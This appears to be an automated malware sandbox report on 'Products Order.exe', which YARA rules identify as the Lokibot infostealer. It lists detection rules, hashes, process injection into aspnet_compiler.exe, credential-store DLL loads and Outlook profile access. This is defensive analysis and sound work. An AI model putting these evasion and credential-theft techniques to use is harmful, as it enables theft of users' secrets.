Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Wed, 15 May 2024 22:38:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp

String found in binary or memory: http://www.ibsensoftware.com/

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

.NET source code contains very large strings

Source: Products Order.exe, QMx9nrlke0nNv5xie5.cs	Long String: Length: 177762
Source: Products Order.exe, QMx9nrlke0nNv5xie5.cs	Long String: Length: 105414

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Products Order.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_0040549C		2_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_004029D4		2_2_004029D4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: String function: 00405B6F appears 42 times

Source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSkidomoney.dll6 vs Products Order.exe
Source: Products Order.exe, 00000000.00000000.1960275029.00000000004D9000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMly015.exe4 vs Products Order.exe
Source: Products Order.exe	Binary or memory string: OriginalFilenameMly015.exe4 vs Products Order.exe

Source: Products Order.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/3@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,

2_2_0040650A

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,

2_2_0040434D

Source: C:\Users\user\Desktop\Products Order.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Products Order.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
Source: C:\Users\user\Desktop\Products Order.exe	Mutant created: NULL

Source: Products Order.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Products Order.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Products Order.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Products Order.exe "C:\Users\user\Desktop\Products Order.exe"
Source: C:\Users\user\Desktop\Products Order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
Source: C:\Users\user\Desktop\Products Order.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: Products Order.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Products Order.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Skidomoney.pdb source: Products Order.exe, 00000000.00000002.1966747720.0000000000A50000.00000004.08000000.00040000.00000000.sdmp
